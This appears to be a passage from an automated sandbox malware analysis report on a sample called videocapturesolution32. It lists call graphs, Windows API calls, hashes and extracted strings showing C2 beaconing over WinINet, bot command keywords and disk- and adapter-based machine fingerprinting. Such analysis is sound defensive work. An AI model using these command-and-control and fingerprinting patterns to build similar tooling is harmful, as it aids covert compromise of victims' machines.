61057 2dc859c 61051->61057 61054->61045 61055->61046 61056->61049 61060 2dc8a58 RtlLeaveCriticalSection 61057->61060 61059 2dc32eb 61059->61036 61060->61059 61062 2dd04c3 61061->61062 61067 2dd04de 61061->61067 61063 2dd04cf 61062->61063 61062->61067 61070 2dc5e5b 59 API calls __getptd_noexit 61063->61070 61064 2dd04ee RtlAllocateHeap 61064->61067 61068 2dd04d4 61064->61068 61067->61064 61067->61068 61071 2dc8204 RtlDecodePointer 61067->61071 61068->60970 61069->60972 61070->61068 61071->61067 61078 2dc8a58 RtlLeaveCriticalSection 61072->61078 61074 2dc5d44 61074->60980 61079 2dc8a58 RtlLeaveCriticalSection 61075->61079 61077 2dc5d92 61077->60983 61078->61074 61079->61077 61080->60989 61874 402d34 61876 40216b 61874->61876 61877 40dc88 61876->61877 61878 401f27 61876->61878 61879 401f3c 61878->61879 61882 401a1d 61879->61882 61881 401f45 61881->61876 61883 401a2c 61882->61883 61888 401a4f CreateFileA 61883->61888 61887 401a3e 61887->61881 61889 401a35 61888->61889 61895 401a7d 61888->61895 61896 401b4b LoadLibraryA 61889->61896 61890 401a98 DeviceIoControl 61890->61895 61891 401b3a CloseHandle 61891->61889 61893 401b0e GetLastError 61893->61891 61893->61895 61895->61890 61895->61891 61895->61893 61905 403106 7 API calls 61895->61905 61906 4030f8 12 API calls 61895->61906 61897 401c21 61896->61897 61898 401b6e GetProcAddress 61896->61898 61897->61887 61899 401c18 FreeLibrary 61898->61899 61902 401b85 61898->61902 61899->61897 61900 401b95 GetAdaptersInfo 61900->61902 61902->61900 61903 401c15 61902->61903 61907 403106 7 API calls 61902->61907 61908 4030f8 12 API calls 61902->61908 61903->61899 61905->61895 61906->61895 61907->61902 61908->61902 61081 2db104d 61082 2dc33a4 __cinit 68 API calls 61081->61082 61083 2db1057 61082->61083 61086 2db1aa9 InterlockedIncrement 61083->61086 61087 2db105c 61086->61087 61088 2db1ac5 WSAStartup InterlockedExchange 61086->61088 61088->61087 61089 2dee084 61090 2dee0a9 61089->61090 61093 2dbf8a2 CreateFileA 61090->61093 61094 2dbf99e 61093->61094 61098 2dbf8d3 61093->61098 61095 2dbf8eb DeviceIoControl 61095->61098 61096 2dbf994 CloseHandle 61096->61094 61097 2dbf960 GetLastError 61097->61096 61097->61098 61098->61095 61098->61096 61098->61097 61098->61098 61100 2dc3b4c 61098->61100 61103 2dc3b54 61100->61103 61102 2dc3b6e 61102->61098 61103->61102 61105 2dc3b72 std::exception::exception 61103->61105 61108 2dc2fac 61103->61108 61125 2dc8204 RtlDecodePointer 61103->61125 61126 2dc455a RaiseException 61105->61126 61107 2dc3b9c 61109 2dc3027 61108->61109 61116 2dc2fb8 61108->61116 61133 2dc8204 RtlDecodePointer 61109->61133 61111 2dc302d 61134 2dc5e5b 59 API calls __getptd_noexit 61111->61134 61114 2dc2feb RtlAllocateHeap 61114->61116 61124 2dc301f 61114->61124 61116->61114 61117 2dc2fc3 61116->61117 61118 2dc3013 61116->61118 61122 2dc3011 61116->61122 61130 2dc8204 RtlDecodePointer 61116->61130 61117->61116 61127 2dc86d4 59 API calls __NMSG_WRITE 61117->61127 61128 2dc8731 59 API calls 7 library calls 61117->61128 61129 2dc831d GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 61117->61129 61131 2dc5e5b 59 API calls __getptd_noexit 61118->61131 61132 2dc5e5b 59 API calls __getptd_noexit 61122->61132 61124->61103 61125->61103 61126->61107 61127->61117 61128->61117 61130->61116 61131->61122 61132->61124 61133->61111 61134->61124 61909 2dee224 CreateFileA 61910 2e0af16 61909->61910 61135 40de9d lstrcmpiW 61911 2dbf9a6 LoadLibraryA 61912 2dbfa89 61911->61912 61913 2dbf9cf GetProcAddress 61911->61913 61914 2dbfa82 FreeLibrary 61913->61914 61917 2dbf9e3 61913->61917 61914->61912 61915 2dbf9f5 GetAdaptersInfo 61915->61917 61916 2dbfa7d 61916->61914 61917->61915 61917->61916 61918 2dc3b4c _Allocate 60 API calls 61917->61918 61918->61917 61136 2e110ff 61137 2e4307c DeleteFileA 61136->61137 61138 2e48072 61137->61138

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 2db72ab-2db72c3 InternetOpenA 1 2db7389-2db738f 0->1 2 2db72c9-2db7340 InternetSetOptionA * 3 call 2dc4af0 InternetOpenUrlA 0->2 4 2db73ab-2db73b9 1->4 5 2db7391-2db7397 1->5 12 2db7382-2db7383 InternetCloseHandle 2->12 13 2db7342 2->13 9 2db73bf-2db73e3 call 2dc4af0 call 2db439c 4->9 10 2db66f4-2db66f6 4->10 7 2db7399-2db739b 5->7 8 2db739d-2db73aa call 2db53ec 5->8 7->4 8->4 9->10 31 2db73e9-2db7417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2dc233c 9->31 14 2db66f8-2db66fd 10->14 15 2db66ff-2db6701 10->15 12->1 18 2db7346-2db736c InternetReadFile 13->18 19 2db6708 Sleep 14->19 20 2db670e-2db6742 RtlEnterCriticalSection RtlLeaveCriticalSection 15->20 21 2db6703 15->21 24 2db736e-2db7375 18->24 25 2db7377-2db737e InternetCloseHandle 18->25 19->20 26 2db6792 20->26 27 2db6744-2db6750 20->27 21->19 24->18 25->12 29 2db6796 26->29 27->26 30 2db6752-2db675f 27->30 32 2db6761-2db6765 30->32 33 2db6767-2db6768 30->33 39 2db7419-2db742b call 2dc233c 31->39 40 2db746d-2db7488 call 2dc233c 31->40 34 2db676c-2db6790 call 2dc4af0 * 2 32->34 33->34 34->29 39->40 49 2db742d-2db743f call 2dc233c 39->49 47 2db748e-2db7490 40->47 48 2db7742-2db7754 call 2dc233c 40->48 47->48 50 2db7496-2db7548 call 2dc2fac RtlEnterCriticalSection RtlLeaveCriticalSection call 2dc4af0 * 5 call 2db439c * 2 47->50 57 2db779d-2db77af call 2dc233c 48->57 58 2db7756-2db7758 48->58 49->40 59 2db7441-2db7453 call 2dc233c 49->59 114 2db754a-2db754c 50->114 115 2db7585 50->115 68 2db77b1-2db77bf call 2db61f5 call 2db6303 57->68 69 2db77d0-2db77e2 call 2dc233c 57->69 58->57 61 2db775a-2db7798 call 2dc4af0 RtlEnterCriticalSection RtlLeaveCriticalSection 58->61 59->40 70 2db7455-2db7467 call 2dc233c 59->70 61->10 86 2db77c4-2db77cb call 2db640e 68->86 82 2db77e8-2db77ea 69->82 83 2db7b00-2db7b12 call 2dc233c 69->83 70->10 70->40 82->83 88 2db77f0-2db7807 call 2db439c 82->88 83->10 95 2db7b18-2db7b46 call 2dc2fac call 2dc4af0 call 2db439c 83->95 86->10 88->10 99 2db780d-2db78db call 2dc2418 call 2db1ba7 88->99 122 2db7b48-2db7b4a call 2db534d 95->122 123 2db7b4f-2db7b56 call 2dc2f74 95->123 112 2db78dd call 2db143f 99->112 113 2db78e2-2db7903 RtlEnterCriticalSection 99->113 112->113 119 2db790f-2db7973 RtlLeaveCriticalSection call 2db3c67 call 2db3d7e call 2db833a 113->119 120 2db7905-2db790c 113->120 114->115 121 2db754e-2db7560 call 2dc233c 114->121 117 2db7589-2db75b7 call 2dc2fac call 2dc4af0 call 2db439c 115->117 144 2db75b9-2db75c8 call 2dc35e6 117->144 145 2db75f8-2db7601 call 2dc2f74 117->145 146 2db7979-2db79c1 call 2dba724 119->146 147 2db7ae7-2db7afb call 2db9002 119->147 120->119 121->115 135 2db7562-2db7583 call 2db439c 121->135 122->123 123->10 135->117 144->145 160 2db75ca 144->160 158 2db7738-2db773b 145->158 159 2db7607-2db761f call 2dc3b4c 145->159 156 2db7ab1-2db7ae2 call 2db83e9 call 2db33b2 146->156 157 2db79c7-2db79ce 146->157 147->10 156->147 161 2db79d1-2db79d6 157->161 158->48 171 2db762b 159->171 172 2db7621-2db7629 call 2db9736 159->172 163 2db75cf-2db75e1 call 2dc2850 160->163 161->161 166 2db79d8-2db7a23 call 2dba724 161->166 177 2db75e3 163->177 178 2db75e6-2db75f6 call 2dc35e6 163->178 166->156 180 2db7a29-2db7a2f 166->180 176 2db762d-2db76cf call 2dba84e call 2db3863 call 2db5119 call 2db3863 call 2dbaaf4 call 2dbac0e 171->176 172->176 201 2db76d4-2db76e5 176->201 177->178 178->145 178->163 184 2db7a32-2db7a37 180->184 184->184 186 2db7a39-2db7a74 call 2dba724 184->186 186->156 193 2db7a76-2db7aaa call 2dbd116 186->193 197 2db7aaf-2db7ab0 193->197 197->156 202 2db76ec-2db7717 Sleep call 2dc18f0 201->202 203 2db76e7 call 2db380b 201->203 207 2db7719-2db7722 call 2db4100 202->207 208 2db7723-2db7731 202->208 203->202 207->208 208->158 209 2db7733 call 2db380b 208->209 209->158
                                                          APIs
                                                          • Sleep.KERNEL32(0000EA60), ref: 02DB6708
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB6713
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB6724
                                                          • InternetOpenA.WININET(?), ref: 02DB72B5
                                                          • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02DB72DD
                                                          • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02DB72F5
                                                          • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02DB730D
                                                          • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02DB7336
                                                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02DB7358
                                                          • InternetCloseHandle.WININET(00000000), ref: 02DB7378
                                                          • InternetCloseHandle.WININET(00000000), ref: 02DB7383
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB73EE
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB73FF
                                                          • _malloc.LIBCMT ref: 02DB7498
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB74AA
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB74B6
                                                          • _malloc.LIBCMT ref: 02DB758E
                                                          • _strtok.LIBCMT ref: 02DB75BF
                                                          • _swscanf.LIBCMT ref: 02DB75D6
                                                          • _strtok.LIBCMT ref: 02DB75ED
                                                          • _free.LIBCMT ref: 02DB75F9
                                                          • Sleep.KERNEL32(000007D0), ref: 02DB76F1
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB7772
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB7784
                                                          • _sprintf.LIBCMT ref: 02DB7822
                                                          • RtlEnterCriticalSection.NTDLL(00000020), ref: 02DB78E6
                                                          • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02DB791A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                          • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                          • API String ID: 1657546717-1839899575
                                                          • Opcode ID: 57505c6520af899eac221797420a73439683a70f9650aecdba99b3a1460d602b
                                                          • Instruction ID: b7210d4ba45b8c5ad29d783e247fd6c0d203ce7503bc80803f418014db472bb1
                                                          • Opcode Fuzzy Hash: 57505c6520af899eac221797420a73439683a70f9650aecdba99b3a1460d602b
                                                          • Instruction Fuzzy Hash: 6E32BF32548381DBE726AB24D865BEBB7E6EFC5314F10081DF58A97391DB70AD04CB62

                                                          Control-flow Graph

                                                          APIs
                                                          • RtlInitializeCriticalSection.NTDLL(02DE71E0), ref: 02DB64BA
                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02DB64D1
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02DB64DA
                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02DB64E9
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02DB64EC
                                                          • GetTickCount.KERNEL32 ref: 02DB64F8
                                                            • Part of subcall function 02DB605A: _malloc.LIBCMT ref: 02DB6068
                                                          • GetVersionExA.KERNEL32(02DE7038), ref: 02DB6525
                                                          • _malloc.LIBCMT ref: 02DB6551
                                                            • Part of subcall function 02DC2FAC: __FF_MSGBANNER.LIBCMT ref: 02DC2FC3
                                                            • Part of subcall function 02DC2FAC: __NMSG_WRITE.LIBCMT ref: 02DC2FCA
                                                            • Part of subcall function 02DC2FAC: RtlAllocateHeap.NTDLL(00910000,00000000,00000001), ref: 02DC2FEF
                                                          • _malloc.LIBCMT ref: 02DB6561
                                                          • _malloc.LIBCMT ref: 02DB656C
                                                          • _malloc.LIBCMT ref: 02DB6577
                                                          • _malloc.LIBCMT ref: 02DB6582
                                                          • _malloc.LIBCMT ref: 02DB658D
                                                          • _malloc.LIBCMT ref: 02DB6598
                                                          • _malloc.LIBCMT ref: 02DB65A7
                                                          • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02DB65BE
                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02DB65C7
                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02DB65D6
                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02DB65D9
                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02DB65E4
                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02DB65E7
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB6621
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB662E
                                                          • _malloc.LIBCMT ref: 02DB6652
                                                          • _malloc.LIBCMT ref: 02DB6660
                                                          • _malloc.LIBCMT ref: 02DB6667
                                                          • _malloc.LIBCMT ref: 02DB668D
                                                          • QueryPerformanceCounter.KERNEL32(00000200), ref: 02DB66A0
                                                          • Sleep.KERNEL32 ref: 02DB66AE
                                                          • _malloc.LIBCMT ref: 02DB66BA
                                                          • _malloc.LIBCMT ref: 02DB66C7
                                                          • Sleep.KERNEL32(0000EA60), ref: 02DB6708
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB6713
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB6724
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _malloc$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                          • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                          • API String ID: 4273019447-2678694477
                                                          • Opcode ID: 8f12b3f723132e816582d605be4c68f591b8ea2f9812a6ee206c2bd69cdcd8dd
                                                          • Instruction ID: 8c9175546d90ff952fedd3e7ad092b8c86701c2bc5921d41b9317cf0279af9f3
                                                          • Opcode Fuzzy Hash: 8f12b3f723132e816582d605be4c68f591b8ea2f9812a6ee206c2bd69cdcd8dd
                                                          • Instruction Fuzzy Hash: 87717071D49340ABE7106F31AC49B6BBBE9EF85710F20085EF98597380DBB49C10CBA6

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 376 401b4b-401b68 LoadLibraryA 377 401c21-401c25 376->377 378 401b6e-401b7f GetProcAddress 376->378 379 401b85-401b8e 378->379 380 401c18-401c1b FreeLibrary 378->380 381 401b95-401ba5 GetAdaptersInfo 379->381 380->377 382 401ba7-401bb0 381->382 383 401bdb-401be3 381->383 384 401bc1-401bd7 call 403120 call 4018cc 382->384 385 401bb2-401bb6 382->385 386 401be5-401beb call 403106 383->386 387 401bec-401bf0 383->387 384->383 385->383 388 401bb8-401bbf 385->388 386->387 391 401bf2-401bf6 387->391 392 401c15-401c17 387->392 388->384 388->385 391->392 393 401bf8-401bfb 391->393 392->380 396 401c06-401c13 call 4030f8 393->396 397 401bfd-401c03 393->397 396->381 396->392 397->396
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 00401B5D
                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                          • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                          • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                          • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                          • API String ID: 514930453-3667123677
                                                          • Opcode ID: a648eded5dba78bf16f4a137e2c2b6b7b052dc293c02733a72e5b458839b5e0e
                                                          • Instruction ID: a9f54c968f2091474e8feb0d981771773be25d9c6ef5ebc30493122ab1168d3f
                                                          • Opcode Fuzzy Hash: a648eded5dba78bf16f4a137e2c2b6b7b052dc293c02733a72e5b458839b5e0e
                                                          • Instruction Fuzzy Hash: E821B870904209AEDF219F65C9447EF7FB8EF45345F0440BAE604B62A1E7389A85CB69

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 483 2dbf9a6-2dbf9c9 LoadLibraryA 484 2dbfa89-2dbfa90 483->484 485 2dbf9cf-2dbf9dd GetProcAddress 483->485 486 2dbf9e3-2dbf9f3 485->486 487 2dbfa82-2dbfa83 FreeLibrary 485->487 488 2dbf9f5-2dbfa01 GetAdaptersInfo 486->488 487->484 489 2dbfa39-2dbfa41 488->489 490 2dbfa03 488->490 492 2dbfa4a-2dbfa4f 489->492 493 2dbfa43-2dbfa49 call 2dc37a8 489->493 491 2dbfa05-2dbfa0c 490->491 497 2dbfa0e-2dbfa12 491->497 498 2dbfa16-2dbfa1e 491->498 495 2dbfa7d-2dbfa81 492->495 496 2dbfa51-2dbfa54 492->496 493->492 495->487 496->495 500 2dbfa56-2dbfa5b 496->500 497->491 501 2dbfa14 497->501 502 2dbfa21-2dbfa26 498->502 503 2dbfa68-2dbfa73 call 2dc3b4c 500->503 504 2dbfa5d-2dbfa65 500->504 501->489 502->502 505 2dbfa28-2dbfa35 call 2dbf6f5 502->505 503->495 510 2dbfa75-2dbfa78 503->510 504->503 505->489 510->488
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02DBF9BC
                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02DBF9D5
                                                          • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02DBF9FA
                                                          • FreeLibrary.KERNEL32(00000000), ref: 02DBFA83
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                          • String ID: GetAdaptersInfo$iphlpapi.dll
                                                          • API String ID: 514930453-3114217049
                                                          • Opcode ID: 2e31f40b09f7fbb168340419f53c6307e0a6ed48ae268b7e8a097f6bef4a836a
                                                          • Instruction ID: cbcc0ba65347720696d044f2f74a5e986049f61456ca34aa012da3d242dcc113
                                                          • Opcode Fuzzy Hash: 2e31f40b09f7fbb168340419f53c6307e0a6ed48ae268b7e8a097f6bef4a836a
                                                          • Instruction Fuzzy Hash: E7219371A08209EFDB15DBA8DC90AEEBBB9EF0A314F1440A9E446E7750D7309D45CBA0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 568 2dbf8a2-2dbf8cd CreateFileA 569 2dbf99e-2dbf9a5 568->569 570 2dbf8d3-2dbf8e8 568->570 571 2dbf8eb-2dbf90d DeviceIoControl 570->571 572 2dbf90f-2dbf917 571->572 573 2dbf946-2dbf94e 571->573 576 2dbf919-2dbf91e 572->576 577 2dbf920-2dbf925 572->577 574 2dbf950-2dbf956 call 2dc37a8 573->574 575 2dbf957-2dbf959 573->575 574->575 579 2dbf95b-2dbf95e 575->579 580 2dbf994-2dbf99d CloseHandle 575->580 576->573 577->573 581 2dbf927-2dbf92f 577->581 583 2dbf97a-2dbf987 call 2dc3b4c 579->583 584 2dbf960-2dbf969 GetLastError 579->584 580->569 585 2dbf932-2dbf937 581->585 583->580 593 2dbf989-2dbf98f 583->593 584->580 586 2dbf96b-2dbf96e 584->586 585->585 588 2dbf939-2dbf945 call 2dbf6f5 585->588 586->583 589 2dbf970-2dbf977 586->589 588->573 589->583 593->571
                                                          APIs
                                                          • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02DBF8C1
                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02DBF8FF
                                                          • GetLastError.KERNEL32 ref: 02DBF960
                                                          • CloseHandle.KERNEL32(?), ref: 02DBF997
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                          • String ID: \\.\PhysicalDrive0
                                                          • API String ID: 4026078076-1180397377
                                                          • Opcode ID: 317ee31f6880bcd2d482042c701f953ef741912aa35a530ef3f19cbd820b3762
                                                          • Instruction ID: 4dd32414141e97d37e7c9d491b3186461266cedb94d96db99374ae1caff62940
                                                          • Opcode Fuzzy Hash: 317ee31f6880bcd2d482042c701f953ef741912aa35a530ef3f19cbd820b3762
                                                          • Instruction Fuzzy Hash: 9D314C71D00219EFDF259F98D894AEEBBB9EF08714F2081A9F506A3780D7705E05CB90

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 594 401a4f-401a77 CreateFileA 595 401b45-401b4a 594->595 596 401a7d-401a91 594->596 597 401a98-401ac0 DeviceIoControl 596->597 598 401ac2-401aca 597->598 599 401af3-401afb 597->599 600 401ad4-401ad9 598->600 601 401acc-401ad2 598->601 602 401b04-401b07 599->602 603 401afd-401b03 call 403106 599->603 600->599 606 401adb-401af1 call 403120 call 4018cc 600->606 601->599 604 401b09-401b0c 602->604 605 401b3a-401b44 CloseHandle 602->605 603->602 608 401b27-401b34 call 4030f8 604->608 609 401b0e-401b17 GetLastError 604->609 605->595 606->599 608->597 608->605 609->605 612 401b19-401b1c 609->612 612->608 615 401b1e-401b24 612->615 615->608
                                                          APIs
                                                          • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                          • DeviceIoControl.KERNEL32(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                          • GetLastError.KERNEL32 ref: 00401B0E
                                                          • CloseHandle.KERNEL32(?), ref: 00401B3D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                          • String ID: \\.\PhysicalDrive0
                                                          • API String ID: 4026078076-1180397377
                                                          • Opcode ID: 5b2aa4f6f1db506efa266d4c362af4cf52cfeed2701d30c33ae5bfe5944f1550
                                                          • Instruction ID: ae54cd8959710a424601ffd4623f532e2396a469a493930b182490efebea7a61
                                                          • Opcode Fuzzy Hash: 5b2aa4f6f1db506efa266d4c362af4cf52cfeed2701d30c33ae5bfe5944f1550
                                                          • Instruction Fuzzy Hash: 50318D71D01118EECB21EF95CD809EFBBB8EF45750F20807AE514B22A0E7785E45CB98

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02DB1D11
                                                          • GetLastError.KERNEL32 ref: 02DB1D23
                                                            • Part of subcall function 02DB1712: __EH_prolog.LIBCMT ref: 02DB1717
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02DB1D59
                                                          • GetLastError.KERNEL32 ref: 02DB1D6B
                                                          • __beginthreadex.LIBCMT ref: 02DB1DB1
                                                          • GetLastError.KERNEL32 ref: 02DB1DC6
                                                          • CloseHandle.KERNEL32(00000000), ref: 02DB1DDD
                                                          • CloseHandle.KERNEL32(00000000), ref: 02DB1DEC
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02DB1E14
                                                          • CloseHandle.KERNEL32(00000000), ref: 02DB1E1B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                          • String ID: thread$thread.entry_event$thread.exit_event
                                                          • API String ID: 831262434-3017686385
                                                          • Opcode ID: 7e7aeecb75f94a69e2a8f3a354bc3ffda40a51c49d1a81772e5ef9bdd2c7fc37
                                                          • Instruction ID: 455c1976765a81e90eaaf685a1395c5c58a013296695e6e3efcbf5defab0fc99
                                                          • Opcode Fuzzy Hash: 7e7aeecb75f94a69e2a8f3a354bc3ffda40a51c49d1a81772e5ef9bdd2c7fc37
                                                          • Instruction Fuzzy Hash: BD315A71A007019FE701EF20C858B6BBBA5EF84754F20496DF959C7390DB709C49CBA2

                                                          Control-flow Graph

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 02DB4D8B
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB4DB7
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB4DC3
                                                            • Part of subcall function 02DB4BED: __EH_prolog.LIBCMT ref: 02DB4BF2
                                                            • Part of subcall function 02DB4BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02DB4CF2
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB4E93
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB4E99
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB4EA0
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB4EA6
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB50A7
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB50AD
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB50B8
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB50C1
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                          • String ID:
                                                          • API String ID: 2062355503-0
                                                          • Opcode ID: bfe4e16c1adc578bf6e4a30fdf901308e27d427862375a717444531f9965aea9
                                                          • Instruction ID: 598fbeac9a0e98c535ba9c5b23cc865c6cda0023954634f4455453abed180741
                                                          • Opcode Fuzzy Hash: bfe4e16c1adc578bf6e4a30fdf901308e27d427862375a717444531f9965aea9
                                                          • Instruction Fuzzy Hash: 19B14A71D0025EDEEF22DF94D860BEEBBB5EF04304F24409AE406A6281DB745E49CFA1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
